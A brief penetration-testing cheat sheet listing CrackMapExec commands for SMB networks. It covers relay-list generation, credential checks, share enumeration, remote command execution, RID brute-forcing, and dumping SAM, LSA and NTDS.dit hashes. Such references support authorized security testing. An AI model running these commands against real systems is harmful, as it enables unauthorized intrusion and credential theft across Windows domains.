CrackMapExec

Find ip/hostname/SMB Signinig/etc:

crackmapexec smb targets.txt

Generate a list of SMB Signing disabled for relays

crackmapexec smb targets.txt --gen-relay-list relay.txt

Find hosts user can log into/is admin on

crackmapexec smb targets.txt -u user -p 'password'

Enumerate shares

crackmapexec smb ip -u user -p 'password' --shares

Dump SAM

crackmapexec smb ip -u user -p 'password' --sam

Dump LSA

crackmapexec smb ip -u user -p 'password' --lsa

Pass cmd

crackmapexec smb ip -u user -p 'password' -x 'command'

Pass powershell

crackmapexec smb ip -u user -p 'password' -X 'command'

List users if Guest account is enabled

crackmapexec smb (ip) -u 'Guest' -p '' --rid-brute

Look at domain admins

crackmapexec smb ip -u user -p 'password' -x 'net group "Domain Admins" /domain'

Look at logged on users

crackmapexec smb ip -u user -p 'password' --loggedon-users

Look at NTDS.dit - is LOUD - USE WITH CAUTION

crackmapexec smb dc-ip -u domain-admin-user -p 'password' --ntds

Last updated